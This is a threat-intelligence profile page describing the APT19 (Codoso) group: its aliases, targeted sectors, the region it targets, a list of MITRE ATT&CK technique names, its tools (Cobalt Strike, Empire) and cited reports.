← threatfilter.dev / all groups / APT19
APT19
Also known as: Codoso · C0d0so0 · Codoso Team · Sunshop Group
Overview
APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. Some analysts track APT19 and Deep Panda as the same group, but it is unclear from open source information if the groups are the same.
Targets
Finance · Military · Non-profit Organisation · Private sector · Technology
Regions
United States
TTPs — 21 techniques across 8 tactics
Resource Development
-
T1588.002Tool
Initial Access
-
T1189Drive-by Compromise -
T1566.001Spearphishing Attachment
Execution
-
T1059Command and Scripting Interpreter -
T1059.001PowerShell -
T1204.002Malicious File
Persistence
-
T1543.003Windows Service -
T1547.001Registry Run Keys / Startup Folder
Stealth
-
T1027.010Command Obfuscation -
T1027.013Encrypted/Encoded File -
T1140Deobfuscate/Decode Files or Information -
T1218.010Regsvr32 -
T1218.011Rundll32 -
T1564.003Hidden Window -
T1574.001DLL
Defense Impairment
-
T1112Modify Registry
Discovery
Command and Control
-
T1071.001Web Protocols -
T1132.001Standard Encoding
Tools & malware (2)
Cobalt Strike · Empire
Reporting (3)
- Privileges and Credentials: Phished at the Request of Counsel — Ahl, I
- ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts — Scott, J. and Spaniel, D
- New Attacks Linked to C0d0so0 Group — Grunzweig, J., Lee, B